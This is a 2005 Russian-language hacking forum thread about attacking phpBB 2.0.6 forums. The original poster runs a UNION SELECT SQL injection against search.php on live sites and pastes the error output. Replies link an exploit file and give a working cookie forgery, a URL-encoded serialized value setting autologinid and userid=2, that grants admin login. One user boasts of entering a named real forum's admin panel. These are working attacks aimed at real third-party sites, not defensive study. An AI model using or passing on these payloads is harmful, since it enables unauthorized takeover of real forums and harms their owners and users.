Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   SQL-injection в PhpBB 2.0.6 (https://forum.antichat.xyz/showthread.php?t=6623)

SQL_error 18.05.2005 16:56
SQL-injection в PhpBB 2.0.6
 
Посмотрел видео KEZ'а про SQL-injection в форуме PhpBB 2.0.6 - ошибка синтаксиса в модуле search.php (search.php?search_id=1'). Нашел форумы на этом движке, вставляю строку search.php?search_id=1' - выходит ошибка. Далее подставляю id=1 UNION SELECT concat(char(97,58,55,58,123........59,125)) FROM phpbb_users WHERE user_id=2/*, но вместо результатов поиска наблюдаю на странице следующее:
Could not obtain search results
DEBUG MODE
SQL Error : -1 ERROR: syntax error at or near "," at character 104
SELECT search_array FROM phpbb_search_results WHERE search_id = 1 UNION SELECT concat(char(97,58,55,58,123,115,58,49,52........11 0,95,99,104,97,114,115,34,59,105,58,50,48,48,59,12 5)) FROM phpbb_users WHERE user_id=2/* AND session_id = '53a7f9e3d98b3a1c3ca90e2cd6c8ee6b'
Line : 693
File : /home1/home/sa/www/public_html/phpBB2/search.php
Т.е наблюдаю ту же ошибку вместе с введенной мною строкой :( И так в нескольких форумах. Подскажите пожалуйста из-за чего это может происходить, может я делаю чего не правильно....
P.S. Я понимаю что видео на античате не является призывом к действию, и не все может получится, что там показывают, но все же очень прошу помочь в моем вопросе новичку, я это использую только для самообразования...

GreenBear 18.05.2005 17:23
мда.
не проще ли пользоваца сплойтом, с которым можно сразу стать админом?

SQL_error 18.05.2005 18:54
Цитата:
Сообщение от Green_Bear
мда.
не проще ли пользоваца сплойтом, с которым можно сразу стать админом?
А как он называется и где его мона взять ???

Grrl 18.05.2005 18:59
возможно причина в том что было удалено самое превое сообщение.

Grrl 18.05.2005 19:02
Сплойт тут вроде
http://rst.void.ru/download/r57phpbb-poc.txt

GreenBear 18.05.2005 19:04
логинишься в опере\мозиле.
удаляешь phpbb2mysql_sid
меняешь phpbb2mysql_data на

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

жмешь обновить.. и все.

Grrl 18.05.2005 19:52
Гы кстати еще полно форумов где катят админские кукисы, особенно буржуйских,
ща по адмнке лазила тут http://www.kona.dk/phpBB2/ :)))) кономейстер гы:)

SQL_error 19.05.2005 08:38
Цитата:
Сообщение от Grrl
Сплойт тут вроде
http://rst.void.ru/download/r57phpbb-poc.txt
Эта ссылка не рабочая, есть ссылка на скомпиленный сплоит ???

OLIVER 19.05.2005 12:33
Блин, Green_Bearт ебе описал самый простой способ и надёжный способ )

Grrl 19.05.2005 14:43
Ссылка рабочая, а если запусткать не умеешь так и скажи:)))
Скампилированный был где-то не помню ссылки...
Как тебе уже и советовали тут, не парься а лучше юзай фокус с кукисами:)))


Время: 03:52
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице